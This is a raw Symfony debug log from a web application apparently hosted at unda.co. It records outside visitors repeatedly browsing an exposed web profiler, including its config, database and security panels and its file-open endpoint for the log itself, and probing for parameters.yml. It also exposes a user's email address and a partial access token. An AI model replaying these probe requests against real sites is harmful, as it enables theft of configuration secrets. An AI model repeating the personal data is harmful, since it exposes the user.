  9695. [2025-12-21 02:23:38] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["e28f9c3e6ae6f49f4a029e5d65 [...]"] []
  9696. [2025-12-21 02:23:38] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
  9697. [2025-12-21 02:23:38] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"nachoslsu@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9698. [2025-12-21 02:23:38] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9699. [2025-12-21 02:23:38] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9700. [2025-12-21 02:23:38] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9701. [2025-12-21 02:30:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00728c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/00728c","method":"GET"} []
  9702. [2025-12-21 02:30:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  9703. [2025-12-21 02:31:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=dump","method":"GET"} []
  9704. [2025-12-21 02:31:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  9705. [2025-12-21 02:40:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9706. [2025-12-21 02:40:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=config","method":"GET"} []
  9707. [2025-12-21 02:40:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  9708. [2025-12-21 02:41:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e86139","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e86139?panel=config","method":"GET"} []
  9709. [2025-12-21 02:41:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  9710. [2025-12-21 02:42:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4990f9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4990f9","method":"GET"} []
  9711. [2025-12-21 02:42:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  9712. [2025-12-21 02:46:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a42aca","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a42aca?panel=events","method":"GET"} []
  9713. [2025-12-21 02:46:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  9714. [2025-12-21 02:49:13] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://auth.unda.co/_profiler/open?file=var%2Flogs%2Fdev.log&line=0","method":"GET"} []
  9715. [2025-12-21 02:55:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7408d6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7408d6","method":"GET"} []
  9716. [2025-12-21 02:55:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  9717. [2025-12-21 02:57:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2d0f32","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2d0f32","method":"GET"} []
  9718. [2025-12-21 02:57:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  9719. [2025-12-21 02:57:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"bb3b91","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/bb3b91?panel=db","method":"GET"} []
  9720. [2025-12-21 02:57:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  9721. [2025-12-21 02:58:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=security","method":"GET"} []
  9722. [2025-12-21 02:58:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  9723. [2025-12-21 03:00:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e86139","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e86139?panel=cache","method":"GET"} []
  9724. [2025-12-21 03:00:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  9725. [2025-12-21 03:03:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9726. [2025-12-21 03:05:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d88c3a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d88c3a?panel=twig","method":"GET"} []
  9727. [2025-12-21 03:05:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  9728. [2025-12-21 03:05:54] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"5ebd67","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/5ebd67/search/results?ip=66.249.75.1&limit=10&url=https%3A%2F%2Funda.co%2F","method":"GET"} []
  9729. [2025-12-21 03:05:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.75.1&limit=10&url=https%3A%2F%2Funda.co%2F","method":"GET"} []
  9730. [2025-12-21 03:06:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=twig","method":"GET"} []
  9731. [2025-12-21 03:06:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  9732. [2025-12-21 03:07:48] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"00728c","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/00728c/search/results?ip=66.249.75.1&limit=10&url=https%3A%2F%2Funda.co%2Findex.html","method":"GET"} []
  9733. [2025-12-21 03:07:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.75.1&limit=10&url=https%3A%2F%2Funda.co%2Findex.html","method":"GET"} []
  9734. [2025-12-21 03:09:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a2a520","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a2a520?group=1&panel=db","method":"GET"} []
  9735. [2025-12-21 03:09:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
  9736. [2025-12-21 03:15:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=exception","method":"GET"} []
  9737. [2025-12-21 03:15:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  9738. [2025-12-21 03:20:18] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"5ebd67","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/5ebd67/search/results?ip=66.249.75.1&limit=10&url=https%3A%2F%2Funda.co%2F","method":"GET"} []
  9739. [2025-12-21 03:20:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.75.1&limit=10&url=https%3A%2F%2Funda.co%2F","method":"GET"} []
  9740. [2025-12-21 03:22:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e86139","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e86139","method":"GET"} []
  9741. [2025-12-21 03:22:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  9742. [2025-12-21 03:24:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f6d265","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/f6d265?panel=config","method":"GET"} []
  9743. [2025-12-21 03:24:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  9744. [2025-12-21 03:24:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"64324b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/64324b?panel=exception","method":"GET"} []
  9745. [2025-12-21 03:24:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  9746. [2025-12-21 03:25:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=validator","method":"GET"} []
  9747. [2025-12-21 03:25:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  9748. [2025-12-21 03:29:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?panel=db","method":"GET"} []
  9749. [2025-12-21 03:29:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  9750. [2025-12-21 03:29:41] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"f40bbd","_route":"_profiler_search_results"},"request_uri":"https://auth.unda.co/_profiler/f40bbd/search/results?ip=180.252.61.142&limit=10","method":"GET"} []
  9751. [2025-12-21 03:29:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?ip=180.252.61.142&limit=10","method":"GET"} []
  9752. [2025-12-21 03:30:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  9753. [2025-12-21 03:31:42] request.INFO: Matched route "_profiler_search". {"route":"_profiler_search","route_parameters":{"_controller":"web_profiler.controller.profiler:searchAction","_route":"_profiler_search"},"request_uri":"https://web.unda.co/_profiler/search","method":"GET"} []
  9754. [2025-12-21 03:31:42] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"empty","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/empty/search/results","method":"GET"} []
  9755. [2025-12-21 03:31:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
  9756. [2025-12-21 03:34:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=logger","method":"GET"} []
  9757. [2025-12-21 03:34:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  9758. [2025-12-21 03:39:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=config","method":"GET"} []
  9759. [2025-12-21 03:39:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  9760. [2025-12-21 03:43:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=request","method":"GET"} []
  9761. [2025-12-21 03:43:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  9762. [2025-12-21 03:47:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d3b11a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d3b11a?panel=exception","method":"GET"} []
  9763. [2025-12-21 03:47:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  9764. [2025-12-21 03:48:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=events","method":"GET"} []
  9765. [2025-12-21 03:48:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  9766. [2025-12-21 03:49:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?panel=time","method":"GET"} []
  9767. [2025-12-21 03:49:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  9768. [2025-12-21 03:51:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=config","method":"GET"} []
  9769. [2025-12-21 03:51:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  9770. [2025-12-21 03:52:47] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"151d9a","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/151d9a/search/results?limit=10&method=GET","method":"GET"} []
  9771. [2025-12-21 03:52:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  9772. [2025-12-21 03:53:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=swiftmailer","method":"GET"} []
  9773. [2025-12-21 03:53:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  9774. [2025-12-21 03:54:24] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"3926d2","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/3926d2/search/results?ip=85.217.140.1&limit=10","method":"GET"} []
  9775. [2025-12-21 03:54:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=85.217.140.1&limit=10","method":"GET"} []
  9776. [2025-12-21 03:54:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"419b71","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/419b71?panel=time","method":"GET"} []
  9777. [2025-12-21 03:54:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  9778. [2025-12-21 03:57:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=dump","method":"GET"} []
  9779. [2025-12-21 03:57:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  9780. [2025-12-21 03:59:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9781. [2025-12-21 03:59:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9782. [2025-12-21 03:59:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /remote/login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /remote/login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9783. [2025-12-21 04:02:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /parameters.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /parameters.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9784. [2025-12-21 04:02:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=cache","method":"GET"} []
  9785. [2025-12-21 04:02:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  9786. [2025-12-21 04:07:10] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"3926d2","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/3926d2/search/results?ip=85.217.140.1&limit=10","method":"GET"} []
  9787. [2025-12-21 04:07:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=85.217.140.1&limit=10","method":"GET"} []
  9788. [2025-12-21 04:08:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ad45cc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ad45cc?panel=config","method":"GET"} []
  9789. [2025-12-21 04:08:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  9790. [2025-12-21 04:11:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=time","method":"GET"} []
  9791. [2025-12-21 04:11:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
